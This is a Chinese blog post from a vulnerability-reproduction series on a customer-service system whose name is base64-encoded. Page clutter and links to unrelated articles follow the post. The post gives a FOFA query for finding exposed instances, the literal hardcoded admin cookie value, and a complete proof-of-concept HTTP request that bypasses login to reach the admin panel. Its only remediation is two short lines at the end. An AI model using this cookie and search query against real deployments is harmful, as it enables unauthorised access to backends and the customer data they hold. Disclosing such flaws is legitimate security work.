54K55LyB5p2l5a6i5pyN57O757uf token硬编码漏洞

已于 2024-09-28 13:36:29 修改
阅读量261 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全
于 2024-09-28 13:25:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142614536
版权

0x01 产品描述:

        54K55LyB5p2l5a6i5pyN57O757uf是独立源码部署的客服系统,支持接入到小程序、公众号、网站、APP。私有化源码部署,数据可控,稳定可靠。可自定义版权、logo。支持网页、微信公众号、小程序、App等任何程序对接

0x02 漏洞描述:

        54K55LyB5p2l5a6i5pyN57O757uf系统中存在一套token硬编码,可利用改token伪造系统登录从而绕过后端接口权限校验检查。

0x03 搜索语句:

Fofa:body="layui-form-item" && body="/admin/login/check.html"

d8ef7ad47cc8480f851b982f337ed608.png

0x04 漏洞复现:

硬编码数据如下:

Cookie:service_token=OuwfoovK%2BIdd

 在cookie中写入上述数据后访问admin/custom/index.html进行主页跳转

c62c5e9c459e4868a2054baf23795ec0.png poc验证

GET /admin/custom/index.html HTTP/1.1
Host: your-ip
Cookie: service_token=OuwfoovK%2BIdd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest

e7fa95c11d1348b19134e603b5abcc48.png

0x05 修复建议:

禁止系统中存放任何形式的硬编码数据。

通过增加ip白名单形式控制外部访问权限。

iSee857
关注
专栏目录
10 | 中国大学MOOC所有课程信息爬虫
微信号:RunsenLiu
04-02 3445
中国大学MOOC所有课程信息爬虫中国大学 MOOC 是网易旗下一款慕课视频教育网站。实话说,这是网易几款教育类产品中,我最喜欢的一个。10 | 中国大学MOOC所有课程信息爬虫(课程ID、学校简称、课程名字、教师、学校全称、学生人数、学生人数、评价人数、平均评价)爬取成果:这里有一个难点:就是课程评价和评分 参加人数。很多人是用selenium处理,但是我觉得太慢了,而且没必要。
HTML5+CSS大作业——大学生活记录个人主页(12页)
11-30 1805
HTML5+CSS大作业——大学生活记录个人主页(12页) 常见网页设计作业题材有 个人、 美食、 公司、 学校、 旅游、 电商、 宠物、 电器、 茶叶、 家居、 酒店、 舞蹈、 动漫、 明星、 服装、 体育、 化妆品、 物流、 环保、 书籍、 婚纱、 军事、 游戏、 节日、 戒烟、 电影、 摄影、 文化、 家乡、 鲜花、 礼品、 汽车、 其他 等网页设计题目, A+水平作业, 可满足大学生网页大作业网页设计需求, 喜欢的可以下载! 获取更多源码 PC电脑端关注我们 ????作者主页-更多源码 ????
大一作业HTML网页作业:中华传统文化题材网页设计5页(纯html+css实现)
网页设计与制作 | HTML+CSS+JS
12-20 1006
🥇 关于作者: 💬历任研发工程师,技术组长,教学总监;曾于2016年、2020年两度荣获CSDN年度十大博客之星。 十载寒冰,难凉热血;多年过去,历经变迁,物是人非。 然而,对于技术的探索和追求从未停歇。 💪坚持原创,热衷分享,初心未改,继往开来!🍵茶文化网站、🏳️‍🌈中华传统文化题材、京剧文化🔏水墨风书画、中国民间年画文化艺术网站 、等网站的设计与制作。🏷️ 这个首页代码运用了DIV盒子的使用方法,如盒子的嵌套、浮动、margin、border、background等属性的使用,外部大盒
【万字文档+PPT+源码】基于SSM框架农产品销售系统-可用于计算机毕设-课程设计-练手学习
专业的计算机毕业设计指南
09-08 3214
该系统以java编程语言、MySQL和前端UI等为开发技术,实现了添加、修改、查看、删除系统数据。本系统采取组件化的方式对系统进行拆分,并对数据库中各个表的增删查改、表与表之间的约束关系进行分析与设计,最终实现符合用户需求功能的商业级应用。系统界面简洁大方,布局合理,易操作易上手。对应用户的每一步操作,系统都能高响应地做出反馈。系统具体包含对用户的管理、登录注销、商品发布、商品维护、订单结算、订单维护等功能,为农产品销售提供一个管理平台,实现对数据地高效、安全地管理
【万字文档+PPT+源码】基于springboot+vue的医院挂号系统-可用于毕设-课程设计-练手学习
专业的计算机毕业设计指南
09-11 2463
医院挂号系统主要功能模块包括医生管理、科室信息管理、挂号预约管理、科室管理、挂号取消管理、核酸预约管理、患者病例管理等,采取面对对象的开发模式进行软件的开发和硬体的架设,能很好的满足实际使用的需求,完善了对应的软体架设以及程序编码的工作,采取MySQL作为后台数据的主要存储单元,采用Springboot框架、JSP技术、Ajax技术进行业务系统的编码及其开发,实现了本系统的全部功能。本次报告,首先分析了研究的背景、作用、意义,为研究工作的合理性打下了基础。针对医院挂号系统的各项需求以及技术问题进行分析,证明
SpringBoot项目如何利用jmh来进行基准测试
Admans的专栏
07-11 984
1、什么是JMHJMH(Java Microbenchmark Harness)是由OpenJDK团队开发的一个用于Java微基准测试工具套件,主要是基于方法层面的基准测试,精度可以达到纳秒级。它提供了一种标准、可靠且可重复的方式来衡量Java代码的性能,包括方法调用、对象创建以及其他类型的 JVM 级别的操作。JMH 通过生成优化过的字节码来确保基准测试不受常见陷阱的影响,如热身不足、垃圾回收干扰、编译器优化等,从而产生更准确的性能指标2、JMH主要使用场景精确测量方法执行时间。
php5的mysqli函数第二个参数,关于php mysqli函数的总结与详细介绍(二)
weixin_28836507的博客
03-23 330
前言:php是一门入门比较简单的编程语言,同时php有非常多的内置函数。所以对于这些内置函数的理解与掌握就显得尤为重要。接下来我们就分析php的一些内置函数。后续我还会继续为大家整理。关于phpMysqli函数的理解:一、什么是php mysqli?php mysqli = php nysqli improvedmysqli函数允许您访问数据库服务器。注意!mysqli扩展用于mysqli4.1....
期末作业代码网页设计HTML5+CSS大作业——大学生活记录个人主页(12页)
qq_524614081的博客
04-22 405
HTML5+CSS大作业——大学生活记录个人主页(12页) 常见网页设计作业题材有 个人、 美食、 公司、 学校、 旅游、 电商、 宠物、 电器、 茶叶、 家居、 酒店、 舞蹈、 动漫、 明星、 服装、 体育、 化妆品、 物流、 环保、 书籍、 婚纱、 军事、 游戏、 节日、 戒烟、 电影、 摄影、 文化、 家乡、 鲜花、 礼品、 汽车、 其他 等网页设计题目, A+水平作业, 可满足大学生网页大作业网页设计需求, 喜欢的可以下载! 文章目录HTML5+CSS大作业——大学生活记录个人主页(12页)一、
LYB
qq_30365511的博客
02-17 143
1.注册 用post方式传用户名,密码,头像 因为上传头像需要enctype=“multipart/form-data” 然后接受post数据,建一个表单存放三个数据,头像用 mediumblob (以免撑爆) 建立连接 然后把数据存入数据库,先查重名 然后存入,转跳主页 2.登录 先防止空密码,然后从数据库取出密码与输入密码对照若密码正确则将用户名设为session用户名,转跳lyb...
冷链设备|基于Java的冷链设备监控系统的设计与实现
软件开发实战项目分享
05-17 955
基于Java的冷链设备监控系统通过测试,确保在最大负载的情况下稳定运转,各个模块工作正常,具有较高的可用性。系统整体界面简洁美观,用户使用简单,满足用户需要。本系统的实现,可以给用户带来个性化的体验,还可以节约企业的成本。
lyb.rar_lyb
09-24
1、数据库安装 (1)将实例目录“App_Data”文件夹下扩展名为... (5)单击“应用”按钮,然后单击“确定”按钮,完成IIS配置。 (6)选中首页文件“Index.aspx”,单击鼠标右键,在弹出的菜单中选择“浏览”菜单项。
lybbs6.zip_lyb_凌云bbs
09-24
凌云BBS系统6,LyBBS ver 6.5.MySQL stable Released on 2006-08-16 for Public Application 全部程序文件使用WinRAR 3.11打包 安装升级之前请先阅读readme.txt 论坛安装需要J2SDK 1.4.0或以上版本支持 ...
lyb.mdb(留言薄Access文件,2003及2012版本)
01-31
《深入解析lyb.mdb:Access数据库在留言簿应用中的技术细节》 lyb.mdb,这个文件名表明它是一个Access数据库文件,用于存储和管理留言簿数据。Access是Microsoft Office套件中的一款关系型数据库管理系统,它允许...
留言板管理系统lyb.rar
09-29
《简单的留言板管理系统——lyb.rar详解》 在信息化飞速发展的今天,各种管理系统已经成为日常工作中不可或缺的工具。其中,留言板管理系统作为一个基础且实用的功能模块,常用于网站、论坛或者内部交流平台,为...
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 590
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 389
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 367
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 578
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 941
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值